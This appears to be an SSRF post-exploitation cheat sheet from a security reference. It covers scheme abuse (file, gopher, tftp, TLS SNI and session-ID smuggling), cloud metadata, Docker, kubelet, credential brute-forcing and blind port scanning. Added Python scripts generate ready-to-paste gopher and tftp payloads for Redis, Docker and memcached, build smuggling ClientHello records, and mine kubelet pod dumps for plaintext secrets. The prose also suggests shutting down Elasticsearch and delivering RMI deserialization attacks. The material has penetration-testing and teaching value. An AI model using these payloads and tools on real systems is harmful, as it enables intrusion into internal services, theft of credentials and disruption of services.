Post Exploitation
Abuse of URL schemes
Accessing local files
You can use the `file` scheme to fetch the content of a file on the server.
Crafting TCP packets
You can use the `ldap`, `git`, or `dict` URL schemes to create cleartext connections to TCP-based services.
Crafting UDP packets
You can send almost arbitrary UDP packets by using the TFTP protocol: the data placed in the URL path becomes the filename of the read request, preceded only by the 2-byte opcode. This can be used to craft requests to UDP services such as Memcached.
Java directory listing
Java's `file://` URL handler returns a directory listing when the path names a directory, so an SSRF in a Java application can list directories as well as read files.
Leaking internal domains
When the SSRF reaches an SMTP service, the greeting banner may leak an internal domain name. Connect to http://127.0.0.1:25 or to an internal address with SMTP available, such as http://10.0.0.6:25, and read the domain from the first line of the response, for example: 220 subdomain.internal-host.com ESMTP Sendmail
TLS fields injection
TLS allows you to smuggle arbitrary data inside fields such as Server Name Indication or the Session ID. You can use this to deliver a payload to HTTP or other text-based services: the target reads the ClientHello as a plain byte stream, so the smuggled bytes arrive intact, just preceded by the binary handshake framing, which the target protocol has to tolerate.
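To see exactly where smuggled bytes land in the first TLS record, here is an added example (not code from the original page or from the research it references) that builds a ClientHello with chosen SNI and session ID contents and parses them back out with their byte offsets. The HTTP and Redis-style strings used as payloads are assumptions for illustration; the cipher suite list is only there so the hello looks ordinary.

```python
"""Build a TLS ClientHello that carries attacker data in its SNI and session ID.

Added example, not code from the original page or from the research it
references.  It shows at which byte offsets smuggled data lands inside the
first TLS record and parses it back out, so a payload can be inspected before
the record is delivered to a plaintext service that reads the raw stream.
The HTTP and Redis-style payload strings are assumptions for illustration.
"""
import os
import struct


def _u16(n: int) -> bytes:
    return struct.pack("!H", n)


def _u24(n: int) -> bytes:
    return struct.pack("!I", n)[1:]


# A few plausible cipher suites so the hello looks ordinary to a real TLS
# server: TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384,
# TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256.
CIPHER_SUITES = b"\x13\x01\x13\x02\xc0\x2f"


def build_client_hello(sni: bytes, session_id: bytes = b"", random_bytes=None) -> bytes:
    """Return one TLS record holding a ClientHello (RFC 5246 framing).

    `sni` goes into the server_name extension; the session ID is limited
    to 32 bytes by the protocol, the extension length field to 16 bits.
    """
    if len(session_id) > 32:
        raise ValueError("session_id is at most 32 bytes")
    if len(sni) > 0xFFFF - 5:
        raise ValueError("server_name too long for the extension length field")
    rnd = os.urandom(32) if random_bytes is None else random_bytes
    # server_name extension: type 0, a list with one entry of name_type 0.
    entry = b"\x00" + _u16(len(sni)) + sni
    sni_ext = _u16(0) + _u16(len(entry) + 2) + _u16(len(entry)) + entry
    body = (
        b"\x03\x03"                        # client_version TLS 1.2
        + rnd                              # 32-byte random
        + bytes([len(session_id)]) + session_id
        + _u16(len(CIPHER_SUITES)) + CIPHER_SUITES
        + b"\x01\x00"                      # one compression method: null
        + _u16(len(sni_ext)) + sni_ext     # extensions block
    )
    handshake = b"\x01" + _u24(len(body)) + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + _u16(len(handshake)) + handshake  # record header


def parse_client_hello(record: bytes) -> dict:
    """Pull the session ID and SNI back out of a record built above and
    report the byte offset at which each starts in the raw stream."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    pos = 9 + 2 + 32                       # headers, version, random
    sid_len = record[pos]
    sid_off = pos + 1
    session_id = record[sid_off:sid_off + sid_len]
    pos = sid_off + sid_len
    cs_len = struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2 + cs_len
    pos += 1 + record[pos]                 # compression methods
    ext_len = struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2
    end = pos + ext_len
    sni, sni_off = None, None
    while pos < end:
        etype, elen = struct.unpack("!HH", record[pos:pos + 4])
        pos += 4
        if etype == 0:
            # skip list length (2) and name_type (1), read name length (2)
            name_len = struct.unpack("!H", record[pos + 3:pos + 5])[0]
            sni_off = pos + 5
            sni = record[sni_off:sni_off + name_len]
        pos += elen
    return {"session_id": session_id, "session_id_offset": sid_off,
            "sni": sni, "sni_offset": sni_off}


if __name__ == "__main__":
    hello = build_client_hello(b"GET / HTTP/1.1\r\nHost: x\r\n\r\n",
                               session_id=b"SET a b\r\n")
    print(parse_client_hello(hello))
```

The offsets are the practical takeaway: the session ID sits 44 bytes into the stream and the SNI a little further, so a service that tolerates a few dozen bytes of binary junk before a line-oriented command will act on the smuggled text. Which field you control in practice depends on the client: the URL hostname only reaches the SNI after hostname validation, while the session ID is whatever a TLS server you control handed out earlier and the client now resumes.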
Retrieving protocol versions
You can enumerate the versions of the different protocols the backend client speaks (HTTP version, TLS version, and so on) by making it send a request to a server you control and inspecting what arrives.
Abusing Gopher
Gopher is a communications protocol designed for distributing, searching, and retrieving documents. Because a gopher client sends the percent-decoded selector from the URL to the server almost verbatim, followed by CRLF, the gopher scheme lets you write nearly arbitrary bytes to any TCP port, which provides a wide range of abuse options.
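The following added example (not code from the original page) serves both the TCP and UDP sections above: it turns a raw payload into a `gopher://` URL for TCP services and a `tftp://` URL for UDP services, and reproduces the bytes a curl-style client actually puts on the wire for each, so the payload can be checked before it goes through the SSRF. The hosts, ports and the Redis and Docker Engine API payloads are assumptions for illustration.

```python
"""Encode raw protocol payloads into gopher:// (TCP) and tftp:// (UDP) URLs.

Added example, not code from the original page.  It produces the URL to
feed into the SSRF and reproduces the bytes a curl-style client puts on
the wire for that URL, so a payload can be checked before it is sent.
Hosts, ports and the Redis/Docker payloads are assumptions for illustration.
"""
from urllib.parse import quote, unquote_to_bytes, urlsplit


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Build a gopher:// URL that delivers `payload` to host:port.

    A gopher client strips the leading slash and the one-byte item type
    from the URL path, percent-decodes the rest (the selector) and sends
    it followed by CRLF.  Encoding every non-alphanumeric byte keeps
    spaces, CR and LF intact through URL parsing on the vulnerable host.
    Recent curl versions reject an encoded NUL (%00) in a gopher selector.
    """
    selector = quote(payload, safe="")
    return f"gopher://{host}:{port}/_{selector}"  # "_" is the item type byte


def gopher_wire_bytes(url: str) -> bytes:
    """Return the bytes a gopher client writes to the socket for `url`."""
    path = urlsplit(url).path
    selector = unquote_to_bytes(path[2:])  # drop "/" and the item type
    return selector + b"\r\n"


def tftp_url(host: str, port: int, payload: bytes) -> str:
    """Build a tftp:// URL whose read request carries `payload` as the filename."""
    return f"tftp://{host}:{port}/{quote(payload, safe='')}"


def tftp_wire_bytes(payload: bytes, mode: str = "octet") -> bytes:
    """Return the RRQ datagram (RFC 1350) a TFTP client sends for `payload`.

    The receiving UDP service sees the 2-byte opcode before the payload and
    a NUL plus the mode string after it.  A protocol with its own datagram
    header (memcached's UDP framing is 8 bytes) needs padding designed
    around that, and the filename cannot contain NUL because clients pass
    it as a C string.
    """
    if b"\x00" in payload:
        raise ValueError("TFTP filenames cannot contain NUL bytes")
    return b"\x00\x01" + payload + b"\x00" + mode.encode("ascii") + b"\x00"


# Payloads for two text-based TCP services reachable through gopher://.
# Redis inline commands (host and port are assumptions):
REDIS_PAYLOAD = b"SET ssrf_probe 1\r\nQUIT\r\n"
# An HTTP request to the Docker Engine API on its plaintext port (assumed):
DOCKER_PAYLOAD = b"GET /containers/json HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"


def example_urls() -> dict:
    """URLs ready to paste into an SSRF parameter (targets are assumptions)."""
    return {
        "redis": gopher_url("127.0.0.1", 6379, REDIS_PAYLOAD),
        "docker": gopher_url("127.0.0.1", 2375, DOCKER_PAYLOAD),
        # UDP probe towards the memcached port; see tftp_wire_bytes on framing.
        "udp": tftp_url("127.0.0.1", 11211, b"stats\r\n"),
    }


if __name__ == "__main__":
    for name, url in example_urls().items():
        print(name, url)
    print(gopher_wire_bytes(example_urls()["redis"]))
    print(tftp_wire_bytes(b"stats\r\n"))
```

The trailing CRLF that gopher appends is why payloads for line-oriented services (Redis, SMTP, HTTP) work so well: the extra empty line is harmless to them. For the UDP side, `tftp_wire_bytes` shows the fixed bytes the target receives around your data; whether a given service accepts the datagram depends entirely on how it parses those surrounding bytes.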
Abuse of cloud metadata
Amazon Web Services
No header required
Google Cloud
Requires the header `Metadata-Flavor: Google` (or the legacy `X-Google-Metadata-Request: True`) on the v1 API; the v1beta1 and v0.1 metadata server endpoints, which did not require the header, were deprecated on September 30, 2020.
Microsoft Azure
Requires the header `Metadata: true`
DigitalOcean
No header required
Packet Cloud
No header required
Alibaba Cloud
No header required
OpenStack
No header required
Oracle Cloud
No header required
Docker
The Docker Engine API is commonly exposed on ports 2375 (plaintext) and 2376 (TLS). Requesting one of its informational endpoints, such as /version or /info, verifies that the Engine API is present. Because the API is plain HTTP, interacting with dockerd through the SSRF works like any other HTTP request (see also the daemon socket option in the Docker documentation).
Docker registry
The Docker registry is commonly available on port 5000; a GET to /v2/ confirms a v2 registry and /v2/_catalog lists its repositories. Access to a registry lets you read sensitive information stored in container images and, if the registry accepts pushes, modify stored container images.
For enumerating repositories/images, pay attention to the following tools:
reg - Docker registry v2 command line client and repo listing generator with security checks
regclient - Docker and OCI Registry Client in Go and tooling using those libraries
go-pillage-registries - Pentester-focused Docker registry tool to enumerate and pull images
Kubernetes
The etcd API behind Kubernetes (client port 2379 by default) holds the cluster state, which can contain API keys, internal IPs and ports.
kubelet
The kubelet API is commonly available on the default port 10250. It is served over TLS and normally requires authentication, but clusters that enable anonymous access expose the same endpoints without credentials.
kubelet read-only
The kubelet read-only API is commonly available on the default port 10255. This port is generally only seen on older clusters, but can provide some useful information disclosure if present. It is a plain HTTP API with no encryption and no authentication, so it is easy to interact with. The most useful endpoint is /pods/, which returns the spec of every pod on the node, including container images, environment variables and volume definitions.
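Reading a /pods/ dump by hand is slow; the added example below (not code from the original page) triages one for the things that matter in post-exploitation: plaintext credentials in environment variables, mounted secrets, service accounts, internal registry images, and containers running privileged or on the host network. The JSON is a constructed, trimmed imitation of what the read-only kubelet returns; every name, image and value in it is invented.

```python
"""Triage a kubelet read-only /pods response for secrets and weak settings.

Added example, not code from the original page.  The sample document is a
constructed, trimmed imitation of the JSON the read-only kubelet returns;
names, images and values in it are invented.
"""
import json
import re

SAMPLE_PODS = json.dumps({
    "kind": "PodList",
    "items": [
        {
            "metadata": {"name": "api-7d9f", "namespace": "payments"},
            "spec": {
                "serviceAccountName": "payments-api",
                "volumes": [
                    {"name": "creds", "secret": {"secretName": "payments-db-creds"}},
                    {"name": "tmp", "emptyDir": {}},
                ],
                "containers": [{
                    "name": "api",
                    "image": "registry.internal:5000/payments/api:1.4.2",
                    "env": [
                        {"name": "DB_PASSWORD", "value": "hunter2"},
                        {"name": "AWS_REGION", "value": "eu-west-1"},
                        {"name": "API_TOKEN",
                         "valueFrom": {"secretKeyRef": {"name": "api-token", "key": "token"}}},
                    ],
                }],
            },
        },
        {
            "metadata": {"name": "node-agent-x2k9", "namespace": "kube-system"},
            "spec": {
                "hostNetwork": True,
                "containers": [{
                    "name": "agent",
                    "image": "agent:latest",
                    "securityContext": {"privileged": True},
                }],
            },
        },
    ],
})

# Env variable names that usually hold credentials.
SECRET_NAME = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|KEY|CREDENTIAL)", re.I)


def summarize_pods(raw: str) -> list:
    """One row per container: where it runs, what it runs, what it can reach."""
    rows = []
    for item in json.loads(raw).get("items", []):
        meta, spec = item["metadata"], item["spec"]
        secret_volumes = [v["secret"]["secretName"]
                          for v in spec.get("volumes", []) if "secret" in v]
        for c in spec.get("containers", []):
            env = c.get("env", [])
            rows.append({
                "namespace": meta["namespace"],
                "pod": meta["name"],
                "container": c["name"],
                "image": c["image"],
                "service_account": spec.get("serviceAccountName", "default"),
                "env_values": {e["name"]: e["value"] for e in env if "value" in e},
                "env_refs": [e["name"] for e in env if "valueFrom" in e],
                "secret_volumes": secret_volumes,
                "privileged": bool(c.get("securityContext", {}).get("privileged")),
                "host_network": bool(spec.get("hostNetwork")),
            })
    return rows


def findings(rows: list) -> list:
    """Flag plaintext credentials in env, mounted secrets and node-level privilege."""
    out = []
    for r in rows:
        where = f'{r["namespace"]}/{r["pod"]}/{r["container"]}'
        for name, value in r["env_values"].items():
            if SECRET_NAME.search(name):
                out.append((where, f"plaintext credential in env {name}={value}"))
        for s in r["secret_volumes"]:
            out.append((where, f"mounts secret {s}"))
        if r["privileged"]:
            out.append((where, "privileged container"))
        if r["host_network"]:
            out.append((where, "hostNetwork pod"))
    return out


if __name__ == "__main__":
    for where, what in findings(summarize_pods(SAMPLE_PODS)):
        print(where, "-", what)
```

Values that come from `valueFrom` references are not in the dump (only their names are), so `env_refs` tells you which secrets exist but not their contents; the image field is also worth a second look because it often points at an internal registry that is itself reachable through the same SSRF.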
Abusing FTP
Credentials bruteforce
SSRF lets you brute-force credentials for resources that use HTTP Basic authentication: put the credentials in the userinfo part of the URL (user:password@host) and vary them from request to request. Characters such as @, : and / inside the password must be percent-encoded or the URL will parse differently.
Enumerating internal resources using anomaly responses
Sometimes you can rely on anomalous responses when the SSRF is blind, that is, when the response to the request is not returned to you. To do this, access internal resources and measure the response time of each request: response time is an indirect sign of whether a resource is reachable. After sending many requests, look for the ones whose response time differs from all the others. This approach allows you to blindly brute-force internal services, open ports, directories and files.
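Finding "the ones that differ" should not be done by eyeballing. The added example below (not code from the original page) scores each probe with a robust outlier statistic based on the median and median absolute deviation, which does not get dragged by the few slow probes the way a mean and standard deviation would, and handles the degenerate case of a perfectly flat baseline. The timings are constructed, not measured; the target address and ports are assumptions.

```python
"""Pick out probe targets whose response time differs from the crowd.

Added example, not code from the original page.  With a blind SSRF only
the time to answer is observable; this uses a robust outlier score (median
and median absolute deviation, MAD) so a few slow probes do not drag the
baseline.  The timings below are constructed, not measured.
"""
import statistics

# Constructed: median response time in seconds for each probe through the SSRF.
SAMPLE_TIMINGS = {
    "http://10.0.0.5:21/":   0.028,
    "http://10.0.0.5:22/":   0.410,   # banner-based service keeps the client waiting
    "http://10.0.0.5:25/":   0.030,
    "http://10.0.0.5:80/":   0.031,
    "http://10.0.0.5:443/":  0.029,
    "http://10.0.0.5:3306/": 0.380,   # same: open port speaking a non-HTTP protocol
    "http://10.0.0.5:5000/": 0.032,
    "http://10.0.0.5:6379/": 0.030,
    "http://10.0.0.5:8080/": 0.027,
    "http://10.0.0.5:8443/": 0.033,
    "http://10.0.0.5:9000/": 3.000,   # filtered port: client timeout
    "http://10.0.0.5:9200/": 0.029,
}


def robust_scores(timings: dict, floor: float = 1e-4) -> dict:
    """Return |0.6745 * (x - median) / MAD| per target (modified z-score)."""
    values = list(timings.values())
    med = statistics.median(values)
    mad = statistics.median(abs(v - med) for v in values)
    mad = max(mad, floor)   # a flat baseline would otherwise divide by zero
    return {t: abs(0.6745 * (v - med) / mad) for t, v in timings.items()}


def find_outliers(timings: dict, threshold: float = 3.5) -> list:
    """Targets whose timing is anomalous, slowest first: (target, time, score)."""
    scores = robust_scores(timings)
    hits = [(t, timings[t], s) for t, s in scores.items() if s > threshold]
    return sorted(hits, key=lambda h: h[1], reverse=True)


def median_per_target(samples: dict) -> dict:
    """Collapse repeated measurements per target to their median before scoring,
    which removes most network jitter; `samples` maps target -> list of seconds."""
    return {t: statistics.median(v) for t, v in samples.items() if v}


if __name__ == "__main__":
    for target, seconds, score in find_outliers(SAMPLE_TIMINGS):
        print(f"{target:28s} {seconds:6.3f}s  score={score:.1f}")
```

Probe each target several times and feed the per-target medians from `median_per_target` into `find_outliers`; a threshold of 3.5 is the usual choice for the modified z-score. The score only says that a target behaves differently, not why: a slow answer can be an open port speaking another protocol, a filtered port, or a large page, so confirm candidates with a second probe type before building on them.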
Port scanning
You can use the `http` scheme for port scanning: open, closed and filtered ports typically produce different error messages, response sizes or response times.
Port scanning using DNS
Many libraries try the addresses from a DNS answer in the order the records are returned. For example, if a name resolves to two A records, 172.16.1.1 first and 172.16.1.2 second, the client first attempts to connect to 172.16.1.1 and, only if that connection fails, to 172.16.1.2. This allows you to find out which ports are open and which are not: a connection that arrives at the second address means the same port on the first address could not be connected to.
For this you can also use the service http://1u.ms. For example, to find open ports on 127.0.0.1, use a name whose first record is 127.0.0.1 and whose second record is an address you control, and change the port number in the URL for each request. If, say, no connection attempts for ports 22 and 6379 arrive at the address from the second DNS record, those ports are open on 127.0.0.1, because the first connection succeeded and the fallback never happened.
Pay attention to which DNS server resolves names on the backend side: a resolver that applies round-robin rotation changes the order of the records between queries and breaks the assumption above.
ASP.NET
Try to read `trace.axd`: it keeps a log of all HTTP requests made to the application, including remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
Apache Druid
Apache Druid is commonly available on ports 80, 8080, 8888 and 8082. Requesting its /status endpoint, which reports the Druid version, verifies that Druid is present.
Apache Solr
Apache Solr is commonly available on port 8983.
Apache Struts
Apache Struts is commonly available on ports 80, 443 (TLS), 8080 and 8443 (TLS).
Apache Tomcat
Apache Tomcat is commonly available on ports 80, 443 (TLS), 8080 and 8443 (TLS).
Consul by HashiCorp
Consul is commonly available on ports 8500 and 8501 (TLS).
Elasticsearch
Elasticsearch is commonly available on port 9200. A GET request to the root path returns a JSON document with the cluster name and version, which verifies that Elasticsearch is present. If you can send POST requests, old instances can be shut down by a POST to the cluster shutdown path; that API existed only in Elasticsearch 1.x and was removed in 2.0.
Java RMI
Java RMI is commonly available on ports 1090, 1098, 1099, 1199, 4443-4446, 8999-9010 and 9999. An SSRF that lets you send arbitrary bytes (for example through the gopher scheme) can deliver deserialization or codebase attacks to the default Java RMI components: the RMI registry, the distributed garbage collector and the activation system.
JBoss
JBoss is commonly available on ports 80, 443 (TLS), 8080 and 8443 (TLS).
Jenkins
Jenkins is commonly available on ports 80, 443 (TLS), 8080 and 8888.
Memcache
Memcached is commonly available on port 11211.
OpenTSDB
OpenTSDB is commonly available on port 4242.
Oracle PeopleSoft
PeopleSoft is commonly available on ports 80 and 443 (TLS).
Oracle WebLogic
WebLogic is commonly available on ports 80, 443 (TLS) and 7001. Known WebLogic vulnerabilities that are triggered by a single HTTP request are candidates for exploitation through the SSRF.
Redis
Redis is commonly available on port 6379.
Remote debuggers